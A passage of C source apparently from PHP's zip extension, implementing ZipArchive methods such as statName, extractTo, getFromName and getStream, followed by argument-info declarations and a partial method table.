cur_idx = zip_name_locate(intern, (const char *)name, 0);
/* TODO: fix _zip_replace */
if (cur_idx >= 0) {
if (zip_delete(intern, cur_idx) == -1) {
zip_source_free(zs);
RETURN_FALSE;
}
}
if (zip_add(intern, name, zs) == -1) {
zip_source_free(zs);
RETURN_FALSE;
} else {
zip_error_clear(intern);
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto array ZipArchive::statName(string filename[, int flags])
Returns the information about a the zip entry filename */
static ZIPARCHIVE_METHOD(statName)
{
struct zip *intern;
zval *self = getThis();
zend_long flags = 0;
struct zip_stat sb;
zend_string *name;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|l", &name, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_PATH(intern, ZSTR_VAL(name), ZSTR_LEN(name), flags, sb);
RETURN_SB(&sb);
}
/* }}} */
/* {{{ proto resource ZipArchive::statIndex(int index[, int flags])
Returns the zip entry informations using its index */
static ZIPARCHIVE_METHOD(statIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index, flags = 0;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|l",
&index, &flags) == FAILURE) {
return;
}
if (zip_stat_index(intern, index, flags, &sb) != 0) {
RETURN_FALSE;
}
RETURN_SB(&sb);
}
/* }}} */
/* {{{ proto int ZipArchive::locateName(string filename[, int flags])
Returns the index of the entry named filename in the archive */
static ZIPARCHIVE_METHOD(locateName)
{
struct zip *intern;
zval *self = getThis();
zend_long flags = 0;
zend_long idx = -1;
zend_string *name;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|l", &name, &flags) == FAILURE) {
return;
}
if (ZSTR_LEN(name) < 1) {
RETURN_FALSE;
}
idx = (zend_long)zip_name_locate(intern, (const char *)ZSTR_VAL(name), flags);
if (idx >= 0) {
RETURN_LONG(idx);
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto string ZipArchive::getNameIndex(int index [, int flags])
Returns the name of the file at position index */
static ZIPARCHIVE_METHOD(getNameIndex)
{
struct zip *intern;
zval *self = getThis();
const char *name;
zend_long flags = 0, index = 0;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|l",
&index, &flags) == FAILURE) {
return;
}
name = zip_get_name(intern, (int) index, flags);
if (name) {
RETVAL_STRING((char *)name);
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::setArchiveComment(string comment)
Set or remove (NULL/'') the comment of the archive */
static ZIPARCHIVE_METHOD(setArchiveComment)
{
struct zip *intern;
zval *self = getThis();
size_t comment_len;
char * comment;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s", &comment, &comment_len) == FAILURE) {
return;
}
if (zip_set_archive_comment(intern, (const char *)comment, (int)comment_len)) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto string ZipArchive::getArchiveComment([int flags])
Returns the comment of an entry using its index */
static ZIPARCHIVE_METHOD(getArchiveComment)
{
struct zip *intern;
zval *self = getThis();
zend_long flags = 0;
const char * comment;
int comment_len = 0;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "|l", &flags) == FAILURE) {
return;
}
comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
if(comment==NULL) {
RETURN_FALSE;
}
RETURN_STRINGL((char *)comment, (zend_long)comment_len);
}
/* }}} */
/* {{{ proto bool ZipArchive::setCommentName(string name, string comment)
Set or remove (NULL/'') the comment of an entry using its Name */
static ZIPARCHIVE_METHOD(setCommentName)
{
struct zip *intern;
zval *self = getThis();
size_t comment_len, name_len;
char * comment, *name;
int idx;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ss",
&name, &name_len, &comment, &comment_len) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
PHP_ZIP_SET_FILE_COMMENT(intern, idx, comment, comment_len);
}
/* }}} */
/* {{{ proto bool ZipArchive::setCommentIndex(int index, string comment)
Set or remove (NULL/'') the comment of an entry using its index */
static ZIPARCHIVE_METHOD(setCommentIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index;
size_t comment_len;
char * comment;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ls",
&index, &comment, &comment_len) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
PHP_ZIP_SET_FILE_COMMENT(intern, index, comment, comment_len);
}
/* }}} */
/* those constants/functions are only available in libzip since 0.11.2 */
#ifdef ZIP_OPSYS_DEFAULT
/* {{{ proto bool ZipArchive::setExternalAttributesName(string name, int opsys, int attr [, int flags])
Set external attributes for file in zip, using its name */
static ZIPARCHIVE_METHOD(setExternalAttributesName)
{
struct zip *intern;
zval *self = getThis();
size_t name_len;
char *name;
zend_long flags=0, opsys, attr;
zip_int64_t idx;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sll|l",
&name, &name_len, &opsys, &attr, &flags) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
if (zip_file_set_external_attributes(intern, idx, (zip_flags_t)flags,
(zip_uint8_t)(opsys&0xff), (zip_uint32_t)attr) < 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::setExternalAttributesIndex(int index, int opsys, int attr [, int flags])
Set external attributes for file in zip, using its index */
static ZIPARCHIVE_METHOD(setExternalAttributesIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index, flags=0, opsys, attr;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "lll|l",
&index, &opsys, &attr, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
if (zip_file_set_external_attributes(intern, (zip_uint64_t)index,
(zip_flags_t)flags, (zip_uint8_t)(opsys&0xff), (zip_uint32_t)attr) < 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::getExternalAttributesName(string name, int &opsys, int &attr [, int flags])
Get external attributes for file in zip, using its name */
static ZIPARCHIVE_METHOD(getExternalAttributesName)
{
struct zip *intern;
zval *self = getThis(), *z_opsys, *z_attr;
size_t name_len;
char *name;
zend_long flags=0;
zip_uint8_t opsys;
zip_uint32_t attr;
zip_int64_t idx;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sz/z/|l",
&name, &name_len, &z_opsys, &z_attr, &flags) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
if (zip_file_get_external_attributes(intern, idx,
(zip_flags_t)flags, &opsys, &attr) < 0) {
RETURN_FALSE;
}
zval_ptr_dtor(z_opsys);
ZVAL_LONG(z_opsys, opsys);
zval_ptr_dtor(z_attr);
ZVAL_LONG(z_attr, attr);
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::getExternalAttributesIndex(int index, int &opsys, int &attr [, int flags])
Get external attributes for file in zip, using its index */
static ZIPARCHIVE_METHOD(getExternalAttributesIndex)
{
struct zip *intern;
zval *self = getThis(), *z_opsys, *z_attr;
zend_long index, flags=0;
zip_uint8_t opsys;
zip_uint32_t attr;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "lz/z/|l",
&index, &z_opsys, &z_attr, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
if (zip_file_get_external_attributes(intern, (zip_uint64_t)index,
(zip_flags_t)flags, &opsys, &attr) < 0) {
RETURN_FALSE;
}
zval_dtor(z_opsys);
ZVAL_LONG(z_opsys, opsys);
zval_dtor(z_attr);
ZVAL_LONG(z_attr, attr);
RETURN_TRUE;
}
/* }}} */
#endif /* ifdef ZIP_OPSYS_DEFAULT */
/* {{{ proto string ZipArchive::getCommentName(string name[, int flags])
Returns the comment of an entry using its name */
static ZIPARCHIVE_METHOD(getCommentName)
{
struct zip *intern;
zval *self = getThis();
size_t name_len;
int idx;
zend_long flags = 0;
int comment_len = 0;
const char * comment;
char *name;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s|l",
&name, &name_len, &flags) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
RETURN_FALSE;
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
comment = zip_get_file_comment(intern, idx, &comment_len, (int)flags);
RETURN_STRINGL((char *)comment, (zend_long)comment_len);
}
/* }}} */
/* {{{ proto string ZipArchive::getCommentIndex(int index[, int flags])
Returns the comment of an entry using its index */
static ZIPARCHIVE_METHOD(getCommentIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index, flags = 0;
const char * comment;
int comment_len = 0;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|l",
&index, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
comment = zip_get_file_comment(intern, index, &comment_len, (int)flags);
RETURN_STRINGL((char *)comment, (zend_long)comment_len);
}
/* }}} */
/* {{{ proto bool ZipArchive::setCompressionName(string name, int comp_method[, int comp_flags])
Set the compression of a file in zip, using its name */
static ZIPARCHIVE_METHOD(setCompressionName)
{
struct zip *intern;
zval *this = getThis();
size_t name_len;
char *name;
zip_int64_t idx;
zend_long comp_method, comp_flags = 0;
if (!this) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, this);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl|l",
&name, &name_len, &comp_method, &comp_flags) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
if (zip_set_file_compression(intern, (zip_uint64_t)idx,
(zip_int32_t)comp_method, (zip_uint32_t)comp_flags) != 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::setCompressionIndex(int index, int comp_method[, int comp_flags])
Set the compression of a file in zip, using its index */
static ZIPARCHIVE_METHOD(setCompressionIndex)
{
struct zip *intern;
zval *this = getThis();
zend_long index;
zend_long comp_method, comp_flags = 0;
if (!this) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, this);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ll|l",
&index, &comp_method, &comp_flags) == FAILURE) {
return;
}
if (zip_set_file_compression(intern, (zip_uint64_t)index,
(zip_int32_t)comp_method, (zip_uint32_t)comp_flags) != 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::deleteIndex(int index)
Delete a file using its index */
static ZIPARCHIVE_METHOD(deleteIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l", &index) == FAILURE) {
return;
}
if (index < 0) {
RETURN_FALSE;
}
if (zip_delete(intern, index) < 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::deleteName(string name)
Delete a file using its index */
static ZIPARCHIVE_METHOD(deleteName)
{
struct zip *intern;
zval *self = getThis();
size_t name_len;
char *name;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s", &name, &name_len) == FAILURE) {
return;
}
if (name_len < 1) {
RETURN_FALSE;
}
PHP_ZIP_STAT_PATH(intern, name, name_len, 0, sb);
if (zip_delete(intern, sb.index)) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::renameIndex(int index, string new_name)
Rename an entry selected by its index to new_name */
static ZIPARCHIVE_METHOD(renameIndex)
{
struct zip *intern;
zval *self = getThis();
char *new_name;
size_t new_name_len;
zend_long index;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ls", &index, &new_name, &new_name_len) == FAILURE) {
return;
}
if (index < 0) {
RETURN_FALSE;
}
if (new_name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as new entry name");
RETURN_FALSE;
}
if (zip_rename(intern, index, (const char *)new_name) != 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::renameName(string name, string new_name)
Rename an entry selected by its name to new_name */
static ZIPARCHIVE_METHOD(renameName)
{
struct zip *intern;
zval *self = getThis();
struct zip_stat sb;
char *name, *new_name;
size_t name_len, new_name_len;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ss", &name, &name_len, &new_name, &new_name_len) == FAILURE) {
return;
}
if (new_name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as new entry name");
RETURN_FALSE;
}
PHP_ZIP_STAT_PATH(intern, name, name_len, 0, sb);
if (zip_rename(intern, sb.index, (const char *)new_name)) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::unchangeIndex(int index)
Changes to the file at position index are reverted */
static ZIPARCHIVE_METHOD(unchangeIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l", &index) == FAILURE) {
return;
}
if (index < 0) {
RETURN_FALSE;
}
if (zip_unchange(intern, index) != 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::unchangeName(string name)
Changes to the file named 'name' are reverted */
static ZIPARCHIVE_METHOD(unchangeName)
{
struct zip *intern;
zval *self = getThis();
struct zip_stat sb;
char *name;
size_t name_len;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s", &name, &name_len) == FAILURE) {
return;
}
if (name_len < 1) {
RETURN_FALSE;
}
PHP_ZIP_STAT_PATH(intern, name, name_len, 0, sb);
if (zip_unchange(intern, sb.index) != 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::unchangeAll()
All changes to files and global information in archive are reverted */
static ZIPARCHIVE_METHOD(unchangeAll)
{
struct zip *intern;
zval *self = getThis();
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zip_unchange_all(intern) != 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::unchangeArchive()
Revert all global changes to the archive archive. For now, this only reverts archive comment changes. */
static ZIPARCHIVE_METHOD(unchangeArchive)
{
struct zip *intern;
zval *self = getThis();
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zip_unchange_archive(intern) != 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::extractTo(string pathto[, mixed files])
Extract one or more file from a zip archive */
/* TODO:
* - allow index or array of indeces
* - replace path
* - patterns
*/
static ZIPARCHIVE_METHOD(extractTo)
{
struct zip *intern;
zval *self = getThis();
zval *zval_files = NULL;
zval *zval_file = NULL;
php_stream_statbuf ssb;
char *pathto;
size_t pathto_len;
int ret, i;
int nelems;
if (!self) {
RETURN_FALSE;
}
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s|z", &pathto, &pathto_len, &zval_files) == FAILURE) {
return;
}
if (pathto_len < 1) {
RETURN_FALSE;
}
if (php_stream_stat_path_ex(pathto, PHP_STREAM_URL_STAT_QUIET, &ssb, NULL) < 0) {
ret = php_stream_mkdir(pathto, 0777, PHP_STREAM_MKDIR_RECURSIVE, NULL);
if (!ret) {
RETURN_FALSE;
}
}
ZIP_FROM_OBJECT(intern, self);
if (zval_files && (Z_TYPE_P(zval_files) != IS_NULL)) {
switch (Z_TYPE_P(zval_files)) {
case IS_STRING:
if (!php_zip_extract_file(intern, pathto, Z_STRVAL_P(zval_files), Z_STRLEN_P(zval_files))) {
RETURN_FALSE;
}
break;
case IS_ARRAY:
nelems = zend_hash_num_elements(Z_ARRVAL_P(zval_files));
if (nelems == 0 ) {
RETURN_FALSE;
}
for (i = 0; i < nelems; i++) {
if ((zval_file = zend_hash_index_find(Z_ARRVAL_P(zval_files), i)) != NULL) {
switch (Z_TYPE_P(zval_file)) {
case IS_LONG:
break;
case IS_STRING:
if (!php_zip_extract_file(intern, pathto, Z_STRVAL_P(zval_file), Z_STRLEN_P(zval_file))) {
RETURN_FALSE;
}
break;
}
}
}
break;
case IS_LONG:
default:
php_error_docref(NULL, E_WARNING, "Invalid argument, expect string or array of strings");
break;
}
} else {
/* Extract all files */
int filecount = zip_get_num_files(intern);
if (filecount == -1) {
php_error_docref(NULL, E_WARNING, "Illegal archive");
RETURN_FALSE;
}
for (i = 0; i < filecount; i++) {
char *file = (char*)zip_get_name(intern, i, ZIP_FL_UNCHANGED);
if (!file || !php_zip_extract_file(intern, pathto, file, strlen(file))) {
RETURN_FALSE;
}
}
}
RETURN_TRUE;
}
/* }}} */
static void php_zip_get_from(INTERNAL_FUNCTION_PARAMETERS, int type) /* {{{ */
{
struct zip *intern;
zval *self = getThis();
struct zip_stat sb;
struct zip_file *zf;
zend_long index = -1;
zend_long flags = 0;
zend_long len = 0;
zend_string *filename;
zend_string *buffer;
int n = 0;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (type == 1) {
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|ll", &filename, &len, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_PATH(intern, ZSTR_VAL(filename), ZSTR_LEN(filename), flags, sb);
} else {
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|ll", &index, &len, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
}
if (sb.size < 1) {
RETURN_EMPTY_STRING();
}
if (len < 1) {
len = sb.size;
}
if (index >= 0) {
zf = zip_fopen_index(intern, index, flags);
} else {
zf = zip_fopen(intern, ZSTR_VAL(filename), flags);
}
if (zf == NULL) {
RETURN_FALSE;
}
buffer = zend_string_safe_alloc(1, len, 0, 0);
n = zip_fread(zf, ZSTR_VAL(buffer), ZSTR_LEN(buffer));
if (n < 1) {
zend_string_free(buffer);
RETURN_EMPTY_STRING();
}
zip_fclose(zf);
ZSTR_VAL(buffer)[n] = '\0';
ZSTR_LEN(buffer) = n;
RETURN_NEW_STR(buffer);
}
/* }}} */
/* {{{ proto string ZipArchive::getFromName(string entryname[, int len [, int flags]])
get the contents of an entry using its name */
static ZIPARCHIVE_METHOD(getFromName)
{
php_zip_get_from(INTERNAL_FUNCTION_PARAM_PASSTHRU, 1);
}
/* }}} */
/* {{{ proto string ZipArchive::getFromIndex(int index[, int len [, int flags]])
get the contents of an entry using its index */
static ZIPARCHIVE_METHOD(getFromIndex)
{
php_zip_get_from(INTERNAL_FUNCTION_PARAM_PASSTHRU, 0);
}
/* }}} */
/* {{{ proto resource ZipArchive::getStream(string entryname)
get a stream for an entry using its name */
static ZIPARCHIVE_METHOD(getStream)
{
struct zip *intern;
zval *self = getThis();
struct zip_stat sb;
char *mode = "rb";
zend_string *filename;
php_stream *stream;
ze_zip_object *obj;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P", &filename) == FAILURE) {
return;
}
if (zip_stat(intern, ZSTR_VAL(filename), 0, &sb) != 0) {
RETURN_FALSE;
}
obj = Z_ZIP_P(self);
stream = php_stream_zip_open(obj->filename, ZSTR_VAL(filename), mode STREAMS_CC);
if (stream) {
php_stream_to_zval(stream, return_value);
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ arginfo */
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_open, 0, 0, 1)
ZEND_ARG_INFO(0, filename)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setpassword, 0, 0, 1)
ZEND_ARG_INFO(0, password)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_ziparchive__void, 0)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addemptydir, 0, 0, 1)
ZEND_ARG_INFO(0, dirname)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addglob, 0, 0, 1)
ZEND_ARG_INFO(0, pattern)
ZEND_ARG_INFO(0, flags)
ZEND_ARG_INFO(0, options)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addpattern, 0, 0, 1)
ZEND_ARG_INFO(0, pattern)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, options)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addfile, 0, 0, 1)
ZEND_ARG_INFO(0, filepath)
ZEND_ARG_INFO(0, entryname)
ZEND_ARG_INFO(0, start)
ZEND_ARG_INFO(0, length)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addfromstring, 0, 0, 2)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, content)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_statname, 0, 0, 1)
ZEND_ARG_INFO(0, filename)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_statindex, 0, 0, 1)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setarchivecomment, 0, 0, 1)
ZEND_ARG_INFO(0, comment)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setcommentindex, 0, 0, 2)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, comment)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getcommentname, 0, 0, 1)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getcommentindex, 0, 0, 1)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_renameindex, 0, 0, 2)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, new_name)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_renamename, 0, 0, 2)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, new_name)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_unchangeindex, 0, 0, 1)
ZEND_ARG_INFO(0, index)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_unchangename, 0, 0, 1)
ZEND_ARG_INFO(0, name)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_extractto, 0, 0, 1)
ZEND_ARG_INFO(0, pathto)
ZEND_ARG_INFO(0, files)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getfromname, 0, 0, 1)
ZEND_ARG_INFO(0, entryname)
ZEND_ARG_INFO(0, len)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getfromindex, 0, 0, 1)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, len)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getarchivecomment, 0, 0, 0)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setcommentname, 0, 0, 2)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, comment)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getstream, 0, 0, 1)
ZEND_ARG_INFO(0, entryname)
ZEND_END_ARG_INFO()
#ifdef ZIP_OPSYS_DEFAULT
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setextattrname, 0, 0, 3)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, opsys)
ZEND_ARG_INFO(0, attr)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setextattrindex, 0, 0, 3)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, opsys)
ZEND_ARG_INFO(0, attr)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getextattrname, 0, 0, 3)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(1, opsys)
ZEND_ARG_INFO(1, attr)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getextattrindex, 0, 0, 3)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(1, opsys)
ZEND_ARG_INFO(1, attr)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
#endif /* ifdef ZIP_OPSYS_DEFAULT */
/* }}} */
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setcompname, 0, 0, 2)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, method)
ZEND_ARG_INFO(0, compflags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setcompindex, 0, 0, 2)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, method)
ZEND_ARG_INFO(0, compflags)
ZEND_END_ARG_INFO()
/* {{{ ze_zip_object_class_functions */
static const zend_function_entry zip_class_functions[] = {
ZIPARCHIVE_ME(open, arginfo_ziparchive_open, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setPassword, arginfo_ziparchive_setpassword, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(close, arginfo_ziparchive__void, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getStatusString, arginfo_ziparchive__void, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addEmptyDir, arginfo_ziparchive_addemptydir, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addFromString, arginfo_ziparchive_addfromstring, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addFile, arginfo_ziparchive_addfile, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addGlob, arginfo_ziparchive_addglob, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addPattern, arginfo_ziparchive_addpattern, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(renameIndex, arginfo_ziparchive_renameindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(renameName, arginfo_ziparchive_renamename, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setArchiveComment, arginfo_ziparchive_setarchivecomment, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getArchiveComment, arginfo_ziparchive_getarchivecomment, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setCommentIndex, arginfo_ziparchive_setcommentindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setCommentName, arginfo_ziparchive_setcommentname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getCommentIndex, arginfo_ziparchive_getcommentindex, ZEND_ACC_PUBLIC)
